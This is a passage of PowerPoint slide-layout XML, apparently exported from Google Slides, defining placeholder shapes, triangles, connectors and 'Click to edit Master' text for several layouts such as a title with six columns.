            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779499" y="4810463"/>
            <a:ext cx="2461600" cy="67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234" name="Google Shape;234;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632400" y="707633"/>
            <a:ext cx="69272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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4079434"/>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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 235"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632400" y="707633"/>
            <a:ext cx="69272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237" name="Google Shape;237;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2323567" y="4678467"/>
            <a:ext cx="3172800" cy="8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238" name="Google Shape;238;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6695693" y="4678467"/>
            <a:ext cx="3172800" cy="8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239" name="Google Shape;239;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487117" y="4331000"/>
            <a:ext cx="28456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240" name="Google Shape;240;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6859283" y="4331000"/>
            <a:ext cx="28456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241" name="Google Shape;241;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="0" y="-48267"/>
            <a:ext cx="3056800" cy="2778800"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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2" name="Google Shape;242;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070800" y="4086433"/>
            <a:ext cx="7153200" cy="33552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26875976"/>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dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 243"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225700" y="950397"/>
            <a:ext cx="11574400" cy="6009200"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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5" name="Google Shape;245;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-2608100" y="-101603"/>
            <a:ext cx="11574400" cy="6009200"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116800" y="1818545"/>
            <a:ext cx="4134400" cy="13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247" name="Google Shape;247;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6939164" y="4704727"/>
            <a:ext cx="4134400" cy="13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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="248" name="Google Shape;248;p34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1834333" y="3233164"/>
            <a:ext cx="4106000" cy="4236400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="249" name="Google Shape;249;p34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10451667" y="-83603"/>
            <a:ext cx="4106000" cy="4236400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6939164" y="3606200"/>
            <a:ext cx="41344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251" name="Google Shape;251;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116800" y="707633"/>
            <a:ext cx="41344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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116915343"/>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solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 252"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1569100" y="2877533"/>
            <a:ext cx="1998800" cy="54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lt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254" name="Google Shape;254;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="3279000"/>
            <a:ext cx="3234800" cy="9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255" name="Google Shape;255;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8624265" y="2877533"/>
            <a:ext cx="1998800" cy="54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lt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256" name="Google Shape;256;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8006244" y="3279000"/>
            <a:ext cx="3234800" cy="9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2133"/>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257" name="Google Shape;257;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5096600" y="2877533"/>
            <a:ext cx="1998800" cy="54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lt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258" name="Google Shape;258;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4478600" y="3279000"/>
            <a:ext cx="3234800" cy="9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259" name="Google Shape;259;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4264600" y="5019555"/>
            <a:ext cx="3637200" cy="1888400"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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0" name="Google Shape;260;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632400" y="707633"/>
            <a:ext cx="69272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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2076087121"/>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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 261"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Google Shape;262;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771767" y="5781033"/>
            <a:ext cx="6972400" cy="566800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" lvl="0" indent="-42332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1219170" lvl="1" indent="-423323" algn="ctr"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828754" lvl="2" indent="-423323" algn="ctr"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2438339" lvl="3" indent="-423323" algn="ctr"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3047924" lvl="4" indent="-423323" algn="ctr"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3657509" lvl="5" indent="-423323" algn="ctr"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4267093" lvl="6" indent="-423323" algn="ctr"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4876678" lvl="7" indent="-423323" algn="ctr"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5486263" lvl="8" indent="-423323" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Google Shape;263;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632400" y="707633"/>
            <a:ext cx="69272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264" name="Google Shape;264;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-692867" y="3182467"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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265" name="Google Shape;265;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-984967" y="3309467"/>
            <a:ext cx="4541200" cy="4403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266" name="Google Shape;266;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8970433" y="-1220733"/>
            <a:ext cx="4541200" cy="4403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267" name="Google Shape;267;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6790333" y="-2030167"/>
            <a:ext cx="7153200" cy="33552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49200849"/>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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 268"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1275167" y="4737412"/>
            <a:ext cx="22116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270" name="Google Shape;270;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="5104007"/>
            <a:ext cx="2860000" cy="9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271" name="Google Shape;271;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8705233" y="4737412"/>
            <a:ext cx="22116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272" name="Google Shape;272;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407033" y="5104007"/>
            <a:ext cx="2860000" cy="9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273" name="Google Shape;273;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5003200" y="4737412"/>
            <a:ext cx="22116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274" name="Google Shape;274;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4679000" y="5104007"/>
            <a:ext cx="2860000" cy="9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275" name="Google Shape;275;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2250600" y="707633"/>
            <a:ext cx="76908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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1803705094"/>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six columns ">
  <p:cSld name="Title and six columns ">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 276"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;277;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4647467" y="2249333"/>
            <a:ext cx="9870800" cy="50588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8" name="Google Shape;278;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039500" y="1911733"/>
            <a:ext cx="10316400" cy="42284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9" name="Google Shape;279;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1391705" y="2440767"/>
            <a:ext cx="2530000" cy="5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400" b="1">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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412305" y="2853711"/>
            <a:ext cx="2488800" cy="7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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1391705" y="4374468"/>
            <a:ext cx="2530000" cy="5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400" b="1">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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412305" y="4819256"/>
            <a:ext cx="2488800" cy="7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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4841813" y="2440767"/>
            <a:ext cx="2509200" cy="5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400" b="1">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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4852013" y="2853701"/>
            <a:ext cx="2488800" cy="7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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4841813" y="4374468"/>
            <a:ext cx="2509200" cy="5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400" b="1">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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4852013" y="4819256"/>
            <a:ext cx="2488800" cy="7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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8286836" y="2440767"/>
            <a:ext cx="2500800" cy="5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400" b="1">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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8292836" y="2853701"/>
            <a:ext cx="2488800" cy="7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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8286836" y="4374468"/>
            <a:ext cx="2500800" cy="5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400" b="1">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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;290;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8292836" y="4819256"/>
            <a:ext cx="2488800" cy="7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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632400" y="707633"/>
            <a:ext cx="69272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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3750680722"/>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bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 292"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1391705" y="4272868"/>
            <a:ext cx="2530000" cy="5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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Google Shape;294;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412305" y="4717656"/>
            <a:ext cx="2488800" cy="7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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3123089" y="2339167"/>
            <a:ext cx="2509200" cy="5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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3133289" y="2752101"/>
            <a:ext cx="2488800" cy="7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r>
